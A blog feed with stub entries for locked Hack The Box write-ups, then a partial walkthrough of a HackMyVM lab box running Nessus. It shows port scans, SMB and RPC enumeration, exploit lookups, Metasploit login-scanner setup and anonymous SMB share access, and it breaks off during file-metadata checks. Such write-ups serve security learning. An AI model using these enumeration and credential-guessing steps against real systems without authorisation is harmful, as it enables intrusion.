This article is password-protected. Please visit https://heathc1iff-sec.github.io/blog/hackthebox-prolabs/zephyr/ to unlock and view the full content.

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: https://heathc1iff-sec.github.io/blog/hackthebox-prolabs/zephyr/

HTB-Xen

呼啸山庄 — Wed, 18 Mar 2026 00:00:00 GMT

This article is password-protected. Please visit https://heathc1iff-sec.github.io/blog/hackthebox-prolabs/xen/ to unlock and view the full content.

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: https://heathc1iff-sec.github.io/blog/hackthebox-prolabs/xen/

HTB-RastaLabs

呼啸山庄 — Tue, 17 Mar 2026 00:00:00 GMT

This article is password-protected. Please visit https://heathc1iff-sec.github.io/blog/hackthebox-prolabs/rastalabs/ to unlock and view the full content.

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: https://heathc1iff-sec.github.io/blog/hackthebox-prolabs/rastalabs/

HTB-Offshore

呼啸山庄 — Tue, 10 Mar 2026 00:00:00 GMT

This article is password-protected. Please visit https://heathc1iff-sec.github.io/blog/hackthebox-prolabs/offshore/ to unlock and view the full content.

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: https://heathc1iff-sec.github.io/blog/hackthebox-prolabs/offshore/

HTB-P.O.O

呼啸山庄 — Wed, 04 Feb 2026 00:00:00 GMT

This article is password-protected. Please visit https://heathc1iff-sec.github.io/blog/hackthebox-prolabs/poo/ to unlock and view the full content.

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: https://heathc1iff-sec.github.io/blog/hackthebox-prolabs/poo/

HTB-Dante

呼啸山庄 — Sun, 01 Feb 2026 00:00:00 GMT

This article is password-protected. Please visit https://heathc1iff-sec.github.io/blog/hackthebox-prolabs/dante/ to unlock and view the full content.

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: https://heathc1iff-sec.github.io/blog/hackthebox-prolabs/dante/

HMV-Nessus

呼啸山庄 — Thu, 29 Jan 2026 00:00:00 GMT

信息收集

IP定位

┌──(web)─(root㉿kali)-[/home/kali]
└─# arp-scan -l | grep 08:00:27

WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
192.168.0.107   08:00:27:ad:9a:f0       (Unknown)

rustscan扫描

┌──(web)─(root㉿kali)-[/home/kali]
└─# rustscan -a 192.168.0.107 -- -A 
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
I scanned my computer so many times, it thinks we're dating.

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 192.168.0.107:135
Open 192.168.0.107:139
Open 192.168.0.107:445
Open 192.168.0.107:5985
Open 192.168.0.107:8834
Open 192.168.0.107:47001
Open 192.168.0.107:49664
Open 192.168.0.107:49665
Open 192.168.0.107:49666
Open 192.168.0.107:49667
Open 192.168.0.107:49668
Open 192.168.0.107:49671
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -A" on ip 192.168.0.107
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-28 08:26 EST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 08:26
Completed NSE at 08:26, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 08:26
Completed NSE at 08:26, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 08:26
Completed NSE at 08:26, 0.00s elapsed
Initiating ARP Ping Scan at 08:26
Scanning 192.168.0.107 [1 port]
Completed ARP Ping Scan at 08:26, 0.09s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:26
Completed Parallel DNS resolution of 1 host. at 08:26, 0.04s elapsed
DNS resolution of 1 IPs took 0.04s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 08:26
Scanning 192.168.0.107 [12 ports]
Discovered open port 445/tcp on 192.168.0.107
Discovered open port 139/tcp on 192.168.0.107
Discovered open port 135/tcp on 192.168.0.107
Discovered open port 49667/tcp on 192.168.0.107
Discovered open port 49671/tcp on 192.168.0.107
Discovered open port 8834/tcp on 192.168.0.107
Discovered open port 49668/tcp on 192.168.0.107
Discovered open port 5985/tcp on 192.168.0.107
Discovered open port 49665/tcp on 192.168.0.107
Discovered open port 49666/tcp on 192.168.0.107
Discovered open port 49664/tcp on 192.168.0.107
Discovered open port 47001/tcp on 192.168.0.107
Completed SYN Stealth Scan at 08:26, 0.03s elapsed (12 total ports)
Initiating Service scan at 08:26
Scanning 12 services on 192.168.0.107
Service scan Timing: About 50.00% done; ETC: 08:27 (0:00:54 remaining)
Completed Service scan at 08:28, 137.41s elapsed (12 services on 1 host)
Initiating OS detection (try #1) against 192.168.0.107
Retrying OS detection (try #2) against 192.168.0.107
NSE: Script scanning 192.168.0.107.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 08:28
Completed NSE at 08:28, 5.50s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 08:28
Completed NSE at 08:28, 1.34s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 08:28
Completed NSE at 08:28, 0.00s elapsed
Nmap scan report for 192.168.0.107
Host is up, received arp-response (0.00054s latency).
Scanned at 2026-01-28 08:26:08 EST for 147s

PORT      STATE SERVICE            REASON          VERSION
135/tcp   open  msrpc              syn-ack ttl 128 Microsoft Windows RPC
139/tcp   open  netbios-ssn        syn-ack ttl 128 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?      syn-ack ttl 128
5985/tcp  open  http               syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8834/tcp  open  ssl/nessus-xmlrpc? syn-ack ttl 128
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=WIN-C05BOCC7F0H/organizationName=Nessus Users United/stateOrProvinceName=NY/countryName=US/localityName=New York/organizationalUnitName=Nessus Server
| Issuer: commonName=Nessus Certification Authority/organizationName=Nessus Users United/stateOrProvinceName=NY/countryName=US/localityName=New York/organizationalUnitName=Nessus Certification Authority
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-10-18T17:36:17
| Not valid after:  2028-10-17T17:36:17
| MD5:   d62f:ddbd:0931:a519:cc87:4c9a:f7bf:6ff7
| SHA-1: 6bf2:207b:dc38:8181:aee2:03dc:0d3d:fa70:dd77:3af6
| -----BEGIN CERTIFICATE-----
| MIIEEjCCAvqgAwIBAgIDAJV2MA0GCSqGSIb3DQEBCwUAMIGdMRwwGgYDVQQKDBNO
| ZXNzdXMgVXNlcnMgVW5pdGVkMScwJQYDVQQLDB5OZXNzdXMgQ2VydGlmaWNhdGlv
| biBBdXRob3JpdHkxETAPBgNVBAcMCE5ldyBZb3JrMQswCQYDVQQGEwJVUzELMAkG
| A1UECAwCTlkxJzAlBgNVBAMMHk5lc3N1cyBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0
| eTAeFw0yNDEwMTgxNzM2MTdaFw0yODEwMTcxNzM2MTdaMH0xHDAaBgNVBAoME05l
| c3N1cyBVc2VycyBVbml0ZWQxFjAUBgNVBAsMDU5lc3N1cyBTZXJ2ZXIxETAPBgNV
| BAcMCE5ldyBZb3JrMQswCQYDVQQGEwJVUzELMAkGA1UECAwCTlkxGDAWBgNVBAMM
| D1dJTi1DMDVCT0NDN0YwSDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEB
| ANYkmLB3EVCbKrHOOzIfW5n/7WZBDBmW2lyg0kz185b10UyNDwiY5AgRwfC2WnaC
| oThJ0QVlVb22s6c1XbaWvyITj1K5xKe1D2uIJHl10EqBcfPq2BefeaXtVoh4jqZu
| VfafEpBwFSPC7dAnO4ZMghKBpWfogM3fYmavNdFptNASZqvTN7hskFETb4ARd397
| WC+fXe+AG4MYgrLyJuZCa+qnI4adkADCCTTtU644Pl8OloVnnK8L5S3wNsEzDXQi
| fvDyZKfo2WMh6BjgjN+X+Cxk4GtFsfX7QCiBr9nKakalE0Mq8nPO4Tm30Tm3GFN6
| looCoH+ZYXAfnUfd8KvHDE8CAwEAAaN6MHgwEQYJYIZIAYb4QgEBBAQDAgZAMA4G
| A1UdDwEB/wQEAwIF4DAdBgNVHQ4EFgQU5ZEiC8RiIg/FclNLopO/rxRBC80wHwYD
| VR0jBBgwFoAULRfLGNDUNuA90xpNsUsFyRiuDyQwEwYDVR0lBAwwCgYIKwYBBQUH
| AwEwDQYJKoZIhvcNAQELBQADggEBAAToblD5fSPM3tyk14/IK0cnDiHSuXFGxXhY
| il7tC177Tb+dNN9vRW58pA4tR+8eDeKUfM+MX6LpJPka4seGbeFjVDppwthlAf44
| ih37bwqAT7Kzznx59VMCjgyDqwe/qprQ9z4OOrD0wnkx4KycTLHmnjCj/rhyUN9+
| WYHPmdwjEiBs2kLGBIVX30+jiwwgd8+nsamEYTVIEB0FCtts3On13KGyS8gpypAr
| e7rQDFdkG+O/M9LKBF+xdcc4SCfEGXdKZnv1V8GVElsYxQ+BxpLjzrI/XLSvqqRm
| 9i8HnGnU8AOEa0rzzdUhzWMjpCj4aG861UAOoOQso5RbHLqNTgU=
|_-----END CERTIFICATE-----
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Cache-Control: must-revalidate
|     X-Frame-Options: DENY
|     Content-Type: text/html
|     ETag: 27393d29a7ce578108e0989bb8e5b05c
|     Connection: close
|     X-XSS-Protection: 1; mode=block
|     Server: NessusWWW
|     Date: Thu, 29 Jan 2026 05:26:39 GMT
|     X-Content-Type-Options: nosniff
|     Content-Length: 1217
|     Content-Security-Policy: upgrade-insecure-requests; block-all-mixed-content; form-action 'self'; frame-ancestors 'none'; frame-src https://store.tenable.com; default-src 'self'; connect-src 'self' www.tenable.com; script-src 'self' www.tenable.com; img-src 'self' data:; style-src 'self' www.tenable.com; object-src 'none'; base-uri 'self';
|     Strict-Transport-Security: max-age=31536000
|     Expect-CT: max-age=0
|     <!doctype html>
|     <html lang="en">
|     <head>
|     <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
|_    <meta http-equiv="Content-Security-Policy" content="upgrade-inse
47001/tcp open  http               syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc              syn-ack ttl 128 Microsoft Windows RPC
49665/tcp open  msrpc              syn-ack ttl 128 Microsoft Windows RPC
49666/tcp open  msrpc              syn-ack ttl 128 Microsoft Windows RPC
49667/tcp open  msrpc              syn-ack ttl 128 Microsoft Windows RPC
49668/tcp open  msrpc              syn-ack ttl 128 Microsoft Windows RPC
49671/tcp open  msrpc              syn-ack ttl 128 Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8834-TCP:V=7.94SVN%T=SSL%I=7%D=1/28%Time=697A0E91%P=x86_64-pc-linux
SF:-gnu%r(GetRequest,788,"HTTP/1\.1\x20200\x20OK\r\nCache-Control:\x20must
SF:-revalidate\r\nX-Frame-Options:\x20DENY\r\nContent-Type:\x20text/html\r
SF:\nETag:\x2027393d29a7ce578108e0989bb8e5b05c\r\nConnection:\x20close\r\n
SF:X-XSS-Protection:\x201;\x20mode=block\r\nServer:\x20NessusWWW\r\nDate:\
SF:x20Thu,\x2029\x20Jan\x202026\x2005:26:39\x20GMT\r\nX-Content-Type-Optio
SF:ns:\x20nosniff\r\nContent-Length:\x201217\r\nContent-Security-Policy:\x
SF:20upgrade-insecure-requests;\x20block-all-mixed-content;\x20form-action
SF:\x20'self';\x20frame-ancestors\x20'none';\x20frame-src\x20https://store
SF:\.tenable\.com;\x20default-src\x20'self';\x20connect-src\x20'self'\x20w
SF:ww\.tenable\.com;\x20script-src\x20'self'\x20www\.tenable\.com;\x20img-
SF:src\x20'self'\x20data:;\x20style-src\x20'self'\x20www\.tenable\.com;\x2
SF:0object-src\x20'none';\x20base-uri\x20'self';\r\nStrict-Transport-Secur
SF:ity:\x20max-age=31536000\r\nExpect-CT:\x20max-age=0\r\n\r\n<!doctype\x2
SF:0html>\n<html\x20lang=\"en\">\n\x20\x20\x20\x20<head>\n\x20\x20\x20\x20
SF:\x20\x20\x20\x20<meta\x20http-equiv=\"X-UA-Compatible\"\x20content=\"IE
SF:=edge,chrome=1\"\x20/>\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20http-e
SF:quiv=\"Content-Security-Policy\"\x20content=\"upgrade-inse");
MAC Address: 08:00:27:AD:9A:F0 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 10|2016|2022|2012|7|8.1|2019|Longhorn|Vista|2008 (97%)
OS CPE: cpe:/o:microsoft:windows_10:1703 cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_7:::ultimate cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2008:r2
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Microsoft Windows 10 1703 (97%), Microsoft Windows Server 2016 build 10586 - 14393 (97%), Microsoft Windows Server 2016 (96%), Microsoft Windows Server 2022 (94%), Microsoft Windows 10 1507 - 1607 (94%), Microsoft Windows Server 2012 R2 Update 1 (94%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (94%), Microsoft Windows 10 1511 (94%), Microsoft Windows Server 2012 or Server 2012 R2 (94%), Microsoft Windows Server 2019 (93%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.94SVN%E=4%D=1/28%OT=135%CT=%CU=43934%PV=Y%DS=1%DC=D%G=N%M=080027%TM=697A0F03%P=x86_64-pc-linux-gnu)
SEQ(SP=106%GCD=1%ISR=108%TI=I%CI=I%II=I%SS=S%TS=A)
OPS(O1=M5B4NW8ST11%O2=M5B4NW8ST11%O3=M5B4NW8NNT11%O4=M5B4NW8ST11%O5=M5B4NW8ST11%O6=M5B4ST11)
WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFDC)
ECN(R=Y%DF=Y%T=80%W=FFFF%O=M5B4NW8NNS%CC=Y%Q=)
T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)
T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)
T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)
T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)
T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
IE(R=Y%DFI=N%T=80%CD=Z)

Uptime guess: 0.004 days (since Wed Jan 28 08:23:15 2026)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| nbstat: NetBIOS name: NESSUS, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:ad:9a:f0 (Oracle VirtualBox virtual NIC)
| Names:
|   NESSUS<00>           Flags: <unique><active>
|   NESSUS<20>           Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
| Statistics:
|   08:00:27:ad:9a:f0:00:00:00:00:00:00:00:00:00:00:00
|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
|_  00:00:00:00:00:00:00:00:00:00:00:00:00:00
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 50829/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 39541/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 64559/udp): CLEAN (Timeout)
|   Check 4 (port 18253/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: -1s
| smb2-time: 
|   date: 2026-01-28T13:28:28
|_  start_date: N/A

TRACEROUTE
HOP RTT     ADDRESS
1   0.54 ms 192.168.0.107

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 08:28
Completed NSE at 08:28, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 08:28
Completed NSE at 08:28, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 08:28
Completed NSE at 08:28, 0.00s elapsed
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 147.99 seconds
           Raw packets sent: 45 (3.392KB) | Rcvd: 45 (3.216KB)

135/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC

139/tcp open netbios-ssn syn-ack ttl 128 Microsoft Windows netbios-ssn

445/tcp open microsoft-ds? syn-ack ttl 128

5985/tcp open http syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

8834/tcp open ssl/nessus-xmlrpc? syn-ack ttl 128

看到445就想SMB 135就想RPC 5985 winrm(远程管理)

139为 NetBIOS-老 SMB

8834/tcp open ssl/nessus-xmlrpc Server: NessusWWW CN=WIN-C05BOCC7F0H

✔️ 这台机正在运行 Nessus 扫描服务

enum4linux

┌──(web)─(root㉿kali)-[/home/kali]
└─# enum4linux -a 192.168.0.107
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Jan 28 08:37:56 2026

 =========================================( Target Information )=========================================       
                                                        
Target ........... 192.168.0.107                        
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===========================( Enumerating Workgroup/Domain on 192.168.0.107 )===========================        
                                                        
                                                        
[+] Got domain/workgroup name: WORKGROUP                
                                                        
                                                        
 ===============================( Nbtstat Information for 192.168.0.107 )===============================        
                                                        
Looking up status of 192.168.0.107                      
        NESSUS          <00> -         B <ACTIVE>  Workstation Service
        NESSUS          <20> -         B <ACTIVE>  File Server Service
        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name

        MAC Address = 08-00-27-AD-9A-F0

 ===================================( Session Check on 192.168.0.107 )===================================       
                                                        
                                                        
[E] Server doesn't allow session using username '', password ''.  Aborting remainder of tests.

Nessus

https://192.168.0.107:8834

┌──(web)─(root㉿kali)-[/home/kali]
└─# searchsploit -t nessus
---------------------- ---------------------------------
 Exploit Title        |  Path
---------------------- ---------------------------------
Nessus 2.0.x - LibNAS | multiple/dos/22634.txt
Nessus 8.2.1 - Cross- | multiple/webapps/46315.txt
Nessus Vulnerability  | windows/remote/4230.html
Nessus Vulnerability  | windows/remote/4237.html
Nessus Web UI 2.3.3 - | multiple/webapps/34929.txt
---------------------- ---------------------------------
Shellcodes: No Results

不知道是哪个，逐个尝试

┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
└─# searchsploit -p 34929
  Exploit: Nessus Web UI 2.3.3 - Persistent Cross-Site Scripting
      URL: https://www.exploit-db.com/exploits/34929
     Path: /usr/share/exploitdb/exploits/multiple/webapps/34929.txt
    Codes: CVE-2014-7280, OSVDB-112728
 Verified: True
File Type: Python script, ASCII text executable, with very long lines (335)
//这是个xss就算了吧
┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
└─# searchsploit -p 22634
  Exploit: Nessus 2.0.x - LibNASL Arbitrary Code Execution
      URL: https://www.exploit-db.com/exploits/22634
     Path: /usr/share/exploitdb/exploits/multiple/dos/22634.txt
    Codes: CVE-2003-0372, OSVDB-3190
 Verified: True
File Type: ASCII text
//这个太老了不用看

每个都看了一遍发现没啥能用的

上msf试试呢？

msf6 > set TARGET 'Windows'
TARGET => Windows
msf6 > search nessus

Matching Modules
================

   #   Name                                           Disclosure Date  Rank       Check  Description
   -   ----                                           ---------------  ----       -----  -----------
   0   exploit/windows/http/altn_webadmin             2003-06-24       average    No     Alt-N WebAdmin USER Buffer Overflow
   1     \_ target: Automatic                         .                .          .      .
   2     \_ target: WebAdmin 2.0.4 Universal          .                .          .      .
   3     \_ target: WebAdmin 2.0.3 Universal          .                .          .      .
   4     \_ target: WebAdmin 2.0.2 Universal          .                .          .      .
   5     \_ target: WebAdmin 2.0.1 Universal          .                .          .      .
   6   exploit/unix/webapp/barracuda_img_exec         2005-09-01       excellent  Yes    Barracuda IMG.PL Remote Command Execution
   7   auxiliary/admin/dns/dyn_dns_update             .                normal     No     DNS Server Dynamic Update Record Injection
   8     \_ action: ADD                               .                .          .      Add a new record. Fail if it already exists.
   9     \_ action: DELETE                            .                .          .      Delete an existing record.
   10    \_ action: UPDATE                            .                .          .      Add or update a record. (default)
   11  exploit/windows/smb/ms10_061_spoolss           2010-09-14       excellent  No     MS10-061 Microsoft Print Spooler Service Impersonation Vulnerability
   12  exploit/windows/http/mailenable_auth_header    2005-04-24       great      Yes    MailEnable Authorization Header Buffer Overflow
   13  exploit/windows/imap/mailenable_status         2005-07-13       great      No     MailEnable IMAPD (1.54) STATUS Request Buffer Overflow
   14    \_ target: MailEnable 1.54 Pro Universal     .                .          .      .
   15    \_ target: Windows XP Pro SP0/SP1 English    .                .          .      .
   16    \_ target: Windows 2000 Pro English ALL      .                .          .      .
   17    \_ target: Windows 2003 Server English       .                .          .      .
   18  exploit/windows/imap/mercury_rename            2004-11-29       average    Yes    Mercury/32 v4.01a IMAP RENAME Buffer Overflow
   19    \_ target: Automatic                         .                .          .      .
   20    \_ target: Windows 2000 SP4 English          .                .          .      .
   21    \_ target: Windows XP Pro SP0 English        .                .          .      .
   22    \_ target: Windows XP Pro SP1 English        .                .          .      .
   23  auxiliary/scanner/nessus/nessus_ntp_login      .                normal     No     Nessus NTP Login Utility
   24  auxiliary/scanner/nessus/nessus_rest_login     .                normal     No     Nessus RPC Interface Login Utility
   25  auxiliary/scanner/nessus/nessus_xmlrpc_login   .                normal     No     Nessus XMLRPC Interface Login Utility
   26  auxiliary/scanner/nessus/nessus_xmlrpc_ping    .                normal     No     Nessus XMLRPC Interface Ping Utility
   27  exploit/multi/misc/teamcity_agent_xmlrpc_exec  2015-04-14       excellent  Yes    TeamCity Agent XML-RPC Command Execution
   28    \_ target: Windows                           .                .          .      .
   29    \_ target: Linux                             .                .          .      .


Interact with a module by name or index. For example info 29, use 29 or use exploit/multi/misc/teamcity_agent_xmlrpc_exec                                               
After interacting with a module you can manually set a TARGET with set TARGET 'Linux'

msf6 auxiliary(scanner/nessus/nessus_xmlrpc_login) > show options 

Module options (auxiliary/scanner/nessus/nessus_xmlrpc_login):

   Name         Current Sett  Required  Description
                ing
   ----         ------------  --------  -----------
   ANONYMOUS_L  false         yes       Attempt to login
   OGIN                                  with a blank us
                                        ername and passw
                                        ord
   BLANK_PASSW  false         no        Try blank passwo
   ORDS                                 rds for all user
                                        s
   BRUTEFORCE_  5             yes       How fast to brut
   SPEED                                eforce, from 0 t
                                        o 5
   DB_ALL_CRED  false         no        Try each user/pa
   S                                    ssword couple st
                                        ored in the curr
                                        ent database
   DB_ALL_PASS  false         no        Add all password
                                        s in the current
                                         database to the
                                         list
   DB_ALL_USER  false         no        Add all users in
   S                                     the current dat
                                        abase to the lis
                                        t
   DB_SKIP_EXI  none          no        Skip existing cr
   STING                                edentials stored
                                         in the current
                                        database (Accept
                                        ed: none, user,
                                        user&realm)
   PASSWORD                   no        A specific passw
                                        ord to authentic
                                        ate with
   PASS_FILE                  no        File containing
                                        passwords, one p
                                        er line
   Proxies                    no        A proxy chain of
                                         format type:hos
                                        t:port[,type:hos
                                        t:port][...]. Su
                                        pported proxies:
                                         socks5, socks5h
                                        , http, sapni, s
                                        ocks4
   RHOSTS                     yes       The target host(
                                        s), see https://
                                        docs.metasploit.
                                        com/docs/using-m
                                        etasploit/basics
                                        /using-metasploi
                                        t.html
   RPORT        8834          yes       The target port
                                        (TCP)
   SSL          true          no        Negotiate SSL/TL
                                        S for outgoing c
                                        onnections
   STOP_ON_SUC  false         yes       Stop guessing wh
   CESS                                 en a credential
                                        works for a host
   THREADS      1             yes       The number of co
                                        ncurrent threads
                                         (max one per ho
                                        st)
   URI          /login        yes       URI for Nessus X
                                        MLRPC login. Def
                                        ault is /login
   USERNAME                   no        A specific usern
                                        ame to authentic
                                        ate as
   USERPASS_FI                no        File containing
   LE                                   users and passwo
                                        rds separated by
                                         space, one pair
                                         per line
   USER_AS_PAS  false         no        Try the username
   S                                     as the password
                                         for all users
   USER_FILE                  no        File containing
                                        usernames, one p
                                        er line
   VERBOSE      true          yes       Whether to print
                                         output for all
                                        attempts
   VHOST                      no        HTTP server virt
                                        ual host


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/nessus/nessus_xmlrpc_login) > set RHOSTS 192.168.0.107
RHOSTS => 192.168.0.107
msf6 auxiliary(scanner/nessus/nessus_xmlrpc_login) > run
[-] 192.168.0.107:8834 - Authorization not requested
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf6 auxiliary(scanner/nessus/nessus_rest_login) > set RHOSTS 192.168.0.107
RHOSTS => 192.168.0.107
msf6 auxiliary(scanner/nessus/nessus_rest_login) > run
[*] Error: 192.168.0.107: Metasploit::Framework::LoginScanner::Invalid Cred details can't be blank, Cred details can't be blank (Metasploit::Framework::LoginScanner::Nessus)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

算了不玩了都是scan模块

wireshark

smb枚举

┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
└─# smbclient -L //192.168.0.107 -N


        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        Documents       Disk      
        IPC$            IPC       Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 192.168.0.107 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
                                                          
┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
└─# crackmapexec smb 192.168.0.107

SMB         192.168.0.107   445    NESSUS           [*] Windows Server 2022 Build 20348 x64 (name:NESSUS) (domain:Nessus) (signing:False) (SMBv1:False)

ADMIN$ → 远程管理共享（默认）

C$ → 系统盘共享（默认）

Documents → ⚠️ 非默认共享（人为创建）

IPC$ → 进程通信

`Documents`

ADMIN$ / C$
👉 几乎 100% 会拒绝匿名访问
IPC$
👉 只能用于会话、RPC，不是文件
**Documents**
👉 这是人为创建的共享
👉 这是目前唯一“值得关注”的点

smb访问

┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
└─# smbclient  //192.168.0.107/Documents -N 

Try "help" to get a list of possible commands.
smb: \> dir
  .                                  DR        0  Fri Oct 18 20:42:53 2024
  ..                                  D        0  Sat Oct 19 01:08:23 2024
  desktop.ini                       AHS      402  Sat Jun 15 13:54:33 2024
  My Basic Network Scan_hwhm7q.pdf      A   122006  Fri Oct 18 18:19:59 2024
  My Music                        DHSrn        0  Sat Jun 15 13:54:27 2024
  My Pictures                     DHSrn        0  Sat Jun 15 13:54:27 2024
  My Videos                       DHSrn        0  Sat Jun 15 13:54:27 2024
  Web Application Tests_f6jg9t.pdf      A   136025  Fri Oct 18 18:20:14 2024

                12942591 blocks of size 4096. 10797127 blocks available

下载俩个pdf文件

是俩扫描记录查看了下没啥用

作者在简介里提到了不会使用CVE漏洞。

Just exploit a well known application without a CVE. Hope you enjoy it.

尝试看一下这俩pdf文件是否存在隐藏信息：

┌──(kali㉿kali)-[~/temp/Nessus]
└─$ exiftool *       
======== desktop.ini
ExifTool Version Number         : 13.10
File Name                       : desktop.ini
Directory                       : .
File Size                       : 402 bytes
File Modification Date/Time     : 2025:06:09 03:48:20-04:00
File Access Date/Time           : 2025:06:09 03:48:46-04:00
File Inode Change Date/Time     : 2025:06:09 03:48:20-04:00
File Permissions                : -rw-r--r--
File Type                       : TXT
File Type Extension             : txt
MIME Type                       : text/plain
MIME Encoding                   : utf-16le
Byte Order Mark                 : Yes
Newlines                        : Windows CRLF
======== My Basic Network Scan_hwhm7q.pdf
ExifTool Version Number         : 13.10
File Name                       : My Basic Network Scan_hwhm7q.pdf
Directory                       : .
File Size                       : 122 kB
